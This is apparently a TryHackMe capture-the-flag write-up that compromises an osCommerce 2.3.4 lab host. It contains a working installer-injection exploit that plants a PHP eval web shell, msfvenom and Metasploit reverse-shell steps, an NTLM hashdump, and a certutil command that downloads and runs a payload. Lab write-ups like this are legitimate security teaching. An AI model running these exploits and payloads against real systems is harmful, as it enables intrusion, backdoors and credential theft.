[TryHackMe] Blueprint (RCE attack)

Posted by fiddler80 on Wed, 17 Nov 2021 12:18:16 +0100


The host attacked in this article is a legally authorized lab target. The tools and methods shown here are for learning and exchange only; do not use them, or the ideas behind them, for any illegal purpose. I accept no responsibility for any misuse or damage that results.

Service detection

└─# nmap -sV -Pn    
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-16 03:34 EST
Stats: 0:02:38 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 69.23% done; ETC: 03:37 (0:00:29 remaining)
Nmap scan report for
Host is up (0.47s latency).
Not shown: 987 closed ports
80/tcp    open  http         Microsoft IIS httpd 7.5
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
443/tcp   open  ssl/http     Apache httpd 2.4.23 (OpenSSL/1.0.2h PHP/5.6.28)
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3306/tcp  open  mysql        MariaDB (unauthorized)
8080/tcp  open  http         Apache httpd 2.4.23 (OpenSSL/1.0.2h PHP/5.6.28)
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49158/tcp open  msrpc        Microsoft Windows RPC
49159/tcp open  msrpc        Microsoft Windows RPC
49160/tcp open  msrpc        Microsoft Windows RPC
Service Info: Hosts: www.example.com, BLUEPRINT, localhost; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 172.68 seconds

Service analysis

Three HTTP services (80, 443, 8080), SMB (139/445), MySQL/MariaDB (3306) and several RPC endpoints are open.

Opening ports 80 and 443 in a browser only produces an error on the home page.

Port 8080 serves a web app, osCommerce 2.3.4.

Search Exploit-DB from Kali (searchsploit) for vulnerabilities in this version:

└─# searchsploit oscommerce 2.3.4
------------------------------------------------------------ ----------------------
 Exploit Title                                              |  Path
------------------------------------------------------------ ----------------------
osCommerce 2.3.4 - Multiple Vulnerabilities                 | php/webapps/34582.txt
osCommerce - 'currency' SQL Injection                       | php/webapps/46328.txt
osCommerce - 'products_id' SQL Injection                    | php/webapps/46329.txt
osCommerce - 'reviews_id' SQL Injection                     | php/webapps/46330.txt
osCommerce - 'title' Persistent Cross-Site Scripting        | php/webapps/49103.txt
osCommerce - Arbitrary File Upload                          | php/webapps/43191.py
osCommerce - Remote Code Execution                          | php/webapps/44374.py
------------------------------------------------------------ ----------------------
Shellcodes: No Results

Plenty to choose from: SQL injection, arbitrary file upload and remote code execution, among others.


We copy the remote code execution script (php/webapps/44374.py) locally. It relies on the osCommerce install/ directory still being reachable after setup and abuses the installer to write attacker-controlled PHP into install/includes/configure.php. In testing, the target's PHP has the system function disabled, but passthru still works.

Running whoami through it echoes: nt authority\system

Nice: we start with the highest privilege straight away.

I was stuck here for a long time because I could not get a reverse shell back to my Kali box directly with PowerShell.

So I changed approach: since a reverse shell would not connect, I could drop a one-line web shell (the classic eval($_POST[...]) backdoor) instead. Fortunately eval is also enabled. The exploit script is modified as follows:

import requests

# base_url is the osCommerce catalog root on the target (left blank here);
# target_url is the installer step that writes install/includes/configure.php,
# as in the original EDB-ID 44374 script.
base_url = ""
target_url = base_url + "install/install.php?step=4"

data = {
    'DIR_FS_DOCUMENT_ROOT': './'
}

# Close the define('DB_DATABASE', '...') string, drop in the one-line web shell,
# then open a block comment so the installer's own trailing '); is swallowed.
payload = '\');'
payload += """eval(@$_POST['cmd']);"""
payload += '/*'

data['DB_DATABASE'] = payload

r = requests.post(url=target_url, data=data)

if r.status_code == 200:
    print("[+] Successfully launched the exploit. Open the following URL to execute your code\n\n" + base_url + "install/includes/configure.php")
else:
    print("[-] Exploit did not execute as planned")
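Why the `');` ... `/*` framing works: the installer drops the submitted DB_DATABASE value straight into a single-quoted PHP string in configure.php. The following Python is an added illustration (my code, not from the original post, from EDB 44374 or from osCommerce) that models that write with a simplified template line (the line layout is an assumption, not osCommerce's real source), then lexes the result with PHP's single-quoted-string rules to show what PHP would execute, beside what a properly escaped write would have produced.

```python
"""Model of the configure.php injection (illustration, not real osCommerce source)."""

# Assumed layout of the line the installer writes; the real file is more complex.
PREFIX = "define('DB_DATABASE', "
SHELL = "eval(@$_POST['cmd']);"          # the one-line web shell from the post


def build_payload(php_code: str) -> str:
    """Close the open string and the define() call, insert PHP, then open a
    block comment so the installer's own trailing '); is swallowed."""
    return "');" + php_code + "/*"


def render_line(value: str, escape: bool = False) -> str:
    """Write the value into the define() line. escape=False is the vulnerable
    behaviour; escape=True applies PHP single-quote escaping (backslash and ')."""
    if escape:
        value = value.replace("\\", "\\\\").replace("'", "\\'")
    return f"{PREFIX}'{value}');"


def php_single_quoted(src: str, start: int):
    """Lex a PHP single-quoted string beginning at src[start] == "'".
    Inside single quotes only \\' and \\\\ are escapes. Returns (value, index_after)."""
    assert src[start] == "'"
    out, i = [], start + 1
    while i < len(src):
        ch = src[i]
        if ch == "\\" and i + 1 < len(src) and src[i + 1] in "\\'":
            out.append(src[i + 1])
            i += 2
            continue
        if ch == "'":
            return "".join(out), i + 1
        out.append(ch)
        i += 1
    raise ValueError("unterminated single-quoted string")


def split_define(line: str):
    """Return (DB_DATABASE value as PHP sees it, code following the define()).
    A non-empty second element means the attacker broke out of the string."""
    start = line.index(PREFIX) + len(PREFIX)
    value, i = php_single_quoted(line, start)
    if not line.startswith(");", i):
        raise ValueError("unexpected token after string literal")
    return value, line[i + 2:]


if __name__ == "__main__":
    payload = build_payload(SHELL)
    for escape in (False, True):
        line = render_line(payload, escape=escape)
        value, trailing = split_define(line)
        print(f"escape={escape}: {line}")
        print(f"  DB_DATABASE -> {value!r}")
        print(f"  code after define() -> {trailing!r}")
```

With the vulnerable write, DB_DATABASE becomes the empty string and everything after it, starting with eval(@$_POST['cmd']);, is live PHP; the /* then comments out the installer's own closing '); so the file still parses. With escaping, the whole payload stays inside the string and nothing follows the define().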

After running the modified script, the web shell lives at install/includes/configure.php and executes PHP sent in the cmd POST parameter, which is exactly what Metasploit's China Chopper (caidao) module speaks. Set its options (PASSWORD is the POST parameter name, TARGETURI the path of the written file):

msf6 exploit(multi/http/caidao_php_backdoor_exec) > options

Module options (exploit/multi/http/caidao_php_backdoor_exec):

   Name       Current Setting                                           Required  Description
   ----       ---------------                                           --------  -----------
   PASSWORD   cmd                                                       yes       The password of backdoor
   Proxies                                                              no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                                               yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      8080                                                      yes       The target port (TCP)
   SSL        false                                                     no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /oscommerce-2.3.4/catalog/install/includes/configure.php  yes       The path of backdoor
   VHOST                                                                no        HTTP server virtual host

Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  tun0             yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

Run the exploit, get the initial shell and confirm it runs as SYSTEM:

msf6 exploit(multi/http/caidao_php_backdoor_exec) > run

[*] Started reverse TCP handler on 
[*] Sending exploit...
[*] Sending stage (39282 bytes) to
[*] Meterpreter session 1 opened ( -> at 2021-11-17 04:10:33 -0500

meterpreter > getuid
Server username: SYSTEM (0)

The caidao module hands back a PHP Meterpreter (php/meterpreter/reverse_tcp), which has no hashdump; that command needs the native Windows Meterpreter. So build a second, fully featured payload with msfvenom:

└─# msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=4242 -f exe > reverse.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of exe file: 73802 bytes

After uploading to the target, execute:

meterpreter > upload /root/tryhackme/Blueprint/reverse.exe
[*] uploading  : /root/tryhackme/Blueprint/reverse.exe -> reverse.exe
[*] Uploaded -1.00 B of 72.07 KiB (-0.0%): /root/tryhackme/Blueprint/reverse.exe -> reverse.exe
[*] uploaded   : /root/tryhackme/Blueprint/reverse.exe -> reverse.exe
meterpreter > execute -f reverse.exe
Process 4668 created.

Catch it with a multi/handler in a second msfconsole; LHOST and LPORT must match the values baked into reverse.exe:

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     yes       The listen address (an interface may be specified)
   LPORT     4242             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 
[*] Sending stage (175174 bytes) to
[*] Meterpreter session 1 opened ( -> at 2021-11-17 04:39:12 -0500

meterpreter > hashdump

From the hashdump output, take the NT hash of the Lab user, 30e87bf999828446a1c1209ddde4c450 (the fourth colon-separated field of its line), and crack it with an online NTLM hash lookup service to recover the plaintext password.

Get root.txt

meterpreter > pwd
meterpreter > ls
Listing: C:\Users\Administrator\Desktop

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100666/rw-rw-rw-  282   fil   2019-04-11 18:36:47 -0400  desktop.ini
100666/rw-rw-rw-  37    fil   2019-11-27 13:15:37 -0500  root.txt.txt


Another, more experienced writer's writeup shows that the following payload, used at the exploit stage instead of the web shell, makes the target fetch a file from the attacker machine with certutil and run it. Recording it here:

payload = '\');'
# The URL argument to certutil -f (the attacker-hosted shell.exe) is missing from this page.
payload += '$var = shell_exec("cmd.exe /C certutil.exe -urlcache -split -f shell.exe & shell.exe & nslookup test ");' 
payload += 'echo $var;'
payload += '/*'

Topics: CTF